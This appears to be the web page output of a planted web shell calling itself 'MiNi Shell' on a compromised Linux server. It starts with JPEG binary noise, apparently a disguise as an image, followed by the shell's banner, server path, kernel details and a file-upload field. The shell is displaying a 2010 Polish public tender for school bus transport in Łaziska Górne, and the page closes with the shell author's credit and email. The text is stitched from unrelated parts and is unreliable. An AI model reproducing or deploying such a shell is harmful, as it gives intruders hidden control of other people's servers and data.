JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100126/17139-N-2010.html

<p class="kh_header"><b>Łaziska Górne: usługi przewozowe dzieci i młodzieży wraz z opiekunami w czasie półkolonii zimowych w roku szkolnym 2009/2010.</b><br>
<b>Numer ogłoszenia: 17139 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Łaziska Górne , pl. Ratuszowy 1, 43-170 Łaziska Górne, woj. śląskie, tel. 032 3248000, faks 032 3248006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.laziska.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi przewozowe dzieci i młodzieży wraz z opiekunami w czasie półkolonii zimowych w roku szkolnym 2009/2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem przetargu jest podstawienie do dyspozycji Zamawiającego sprawnych  z aktualnymi badaniami diagnostycznymi autokarów na usługi przewozowe dzieci i młodzieży wraz z opiekunami w czasie półkolonii zimowych w roku szkolnym 2009/2010 wg harmonogramu:

PONIEDZIAŁEK      15 lutego 2010 roku:

Szkoła Podstawowa Nr 1, ul. Dworcowa 4 w Łaziskach Górnych

-podstawienie 2-ch autokarów na przewóz około 65 osób  do Figloraju w Rybniku,                        wyjazd o godz. 10.00 powrót ok. godz. 14.00

Szkoła Podstawowa Nr 6, ul. Wyrska 4 w Łaziskach Górnych

-podstawienie 1 autokaru dla około 40 osób na Halę MOSiR-u w Łaziskach Górnych,                      ul. Ogrodowa; wyjazd o godz. 12.30 powrót ok. godz. 14.15
-podstawienie 1 autokaru dla około 40 osób na Halę MOSiR-u w Łaziskach Górnych,                            ul. Ogrodowa; wyjazd o godz. 13.30 powrót ok. godz. 15.15


WTOREK      16 lutego 2010 roku:

Szkoła Podstawowa Nr 1, ul. Dworcowa 4 w Łaziskach Górnych

-podstawienie 2-ch autokarów na przewóz około 65 osób na basen do Czerwionki - Leszczyn, wyjazd o godz. 10.15  powrót na godz. 12.45
-podstawienie 2-ch autokarów na przewóz około 65 osób na basen do Czerwionki - Leszczyn, wyjazd o godz. 12.15  powrót na godz. 14.45

Szkoła Podstawowa Nr 6, ul. Wyrska 4 w Łaziskach Górnych

-podstawienie 3-ch autokarów na przewóz około 130 osób do kina Imax w Katowicach,  wyjazd o godz. 9.00 powrót ok. godz. 13.00 z Katowic


ŚRODA     17 lutego 2010 rok:

Szkoła Podstawowa Nr 1, ul. Dworcowa 4 w Łaziskach Górnych:

-podstawienie 3-ch autokarów na przewóz około 135 osób  na wycieczkę do ZOO                             w Chorzowie, wyjazd o godz. 10.00  powrót między godz. 14.30   a   15.00

Szkoła Podstawowa Nr 6, ul. Wyrska 4 w Łaziskach Górnych

-podstawienie 3-ch autokarów na przewóz około 130 osób na wycieczkę do Ustronia                      lub Bielska- Białej, wyjazd o godz. 9.00  powrót około godz. 16.00 w Łaziskach Górnych



CZWARTEK       18 lutego 2010 rok:

Szkoła Podstawowa Nr 1, ul. Dworcowa 4 w Łaziskach Górnych

-podstawienie 2-ch autokarów na przewóz około 65 osób na basen do Czerwionki - Leszczyn, wyjazd o godz. 10.15  powrót na godz. 12.45
-podstawienie 2-ch autokarów  na przewóz około 65 osób  na basen do Czerwionki - Leszczyn  wyjazd o godz. 12.15 powrót na godz. 14.45

Szkoła Podstawowa Nr 6, ul. Wyrska 4 w Łaziskach Górnych

-podstawienie 2-ch autokarów na przewóz około 60 osób  na basen do Czerwionki- Leszczyn, wyjazd o godz. 9.30  powrót ok. godz. 11.30 z Czerwionki - Leszczyn
-podstawienie 2-ch autokarów na przewóz około 60 osób  na basen do Czerwionki- Leszczyn, wyjazd o godz. 11.30  powrót ok. godz. 13.30 z Czerwionki - Leszczyn


PIĄTEK    19 lutego 2010 rok:

Szkoła Podstawowa Nr 1, ul. Dworcowa 4 w Łaziskach Górnych

-podstawienie 2-ch autokarów na przewóz około 65 osób  do Figloraju w Rybniku,                    wyjazd o godz. 1000 powrót na godz. 1400

Szkoła Podstawowa Nr 6, ul. Wyrska 4 w Łaziskach Górnych

- 	podstawienie 2-ch autokarów na przewóz  około 60 osób  na lodowisko Żabka w Łaziskach  Górnych, wyjazd o godz. 10.00 powrót około godz. 11.45
- 	podstawienie 2-ch autokarów na przewóz  około 60 osób  na lodowisko Żabka w Łaziskach  Górnych, wyjazd o godz. 11.30 powrót około godz. 13.15

Organizator  zastrzega sobie wprowadzenie zmian w harmonogramie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WADIUM NIE JEST WYMAGANE<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 7O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki i wymagania określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 
ust. 1 ustawy Prawo zamówień publicznych  tj. warunki dotyczące:
1.  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2.  posiadania niezbędnej wiedzy i doświadczenia;
3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  zamówienia;
4.sytuacji ekonomicznej i finansowej.	
Na potwierdzenie spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, wykonawca winien posiadać licencję na wykonywanie krajowego transportu drogowego, wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity Dz. U. z 2007 r. Nr 125, poz. 874 ze zm.)
Na potwierdzenie spełniania warunku dysponowania potencjałem technicznym wykonawca winien wykazać, że dysponuje:
-    co najmniej dwoma  autokarami, które posiadają możliwość przewozu  nie mniej niż 35  osób  każdy autokar;
-   co najmniej jednym  autokarem, który posiada możliwość przewozu  nie mniej niż 40 osób;
-   co najmniej czterema autokarami, które posiadają możliwość przewozu  nie mniej niż  48  osób każdy autokar.
Ocena spełnienia ww. warunków udziału w postępowaniu zostanie dokonana zgodnie z  formułą spełnia / nie spełnia, na podstawie złożonych oświadczeń i dokumentów wyszczególnionych w pkt  9.1 specyfikacji istotnych warunków zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia przez wykonawcę warunków udziału w postępowaniu, wykonawca wraz z ofertą winien złożyć następujące dokumenty i oświadczenia:
1.W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania działalności objętej przedmiotem zamówienia, wykonawca winien przedstawić aktualną licencję na wykonywanie krajowego transportu drogowego wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity Dz. U. z 2007 r. Nr 125, poz. 874 ze zm.)
Dokument należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
W przypadku złożenia oferty przez wykonawców występujących wspólnie powyższy dokument musi być złożony osobno przez każdego z wykonawców.
2.W celu potwierdzenia, że wykonawca dysponuje potencjałem technicznym do wykonania zamówienia, w tym co najmniej dwoma  autokarami, które posiadają możliwość przewozu  nie mniej niż 35 osób  każdy autokar, co najmniej jednym  autokarem, który posiada możliwość przewozu  nie mniej niż 40 osób, co najmniej czterema autokarami, które posiadają możliwość przewozu  nie mniej niż 48  osób każdy autokar oraz co najmniej jednym autokarem, który posiada możliwość przewozu nie mniej niż 49 osób, należy załączyć do oferty odpowiednio wypełniony załącznik nr 6 do specyfikacji  Potencjał techniczny stanowiący wykaz niezbędnych do wykonania zamówienia pojazdów, którymi dysponuje lub będzie dysponował wykonawca, wraz z informacją o podstawie dysponowania tymi pojazdami.
3.Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu. 
W celu potwierdzenia spełnienia warunków udziału w postępowaniu do oferty należy załączyć Oświadczenie o spełnianiu warunków udziału w postępowaniu sporządzone zgodnie z załącznikiem nr 4  do specyfikacji.
W przypadku złożenia oferty przez wykonawców ubiegających się wspólnie 
o udzielenie zamówienia, do oferty należy załączyć jeden dokument oświadczenia, podpisany przez wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podpisany przez osobę posiadającą umocowanie do składania oświadczeń woli w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.
W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy, w okolicznościach o których mowa w art. 24 ust. 1  ustawy Prawo zamówień publicznych, wykonawca wraz z ofertą winien złożyć następujące dokumenty i oświadczenia:
1.Oświadczenie o braku podstaw do wykluczenia z postępowania.
Wykonawca do oferty winien załączyć Oświadczenie o braku podstaw do wykluczenia z postępowania sporządzone według wzoru stanowiącego  załącznik nr 5 do specyfikacji.
W przypadku złożenia oferty przez wykonawców ubiegających się wspólnie 
o udzielenie zamówienia, powyższy dokument oświadczenia, każdy z wykonawców winien podpisać osobno oraz załączyć do oferty.
2.Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia z postępowania w oparciu o art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych sporządzone według wzoru stanowiącego załącznik nr 7 do niniejszej specyfikacji.
W/w dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej 
za  zgodność z oryginałem przez wykonawcę.
W przypadku złożenia oferty przez wykonawców występujących wspólnie, powyższe dokumenty muszą być złożone osobno przez każdego z wykonawców. 
W przypadku Wykonawców będących Podmiotami Zagranicznymi obowiązuje załączenie dokumentów zgodnych z § 4 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://przetargi.laziska.um.gov.pl/ZP-001-10.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, Łaziska Górne Pl. Ratuszowy 1, Punkt Obsługi Interesanta, cena 10 zł lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2010 godzina 10:00, miejsce: w siedzibie Zamawiającego, Łaziska Górne Pl. Ratuszowy 1, Punkt Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com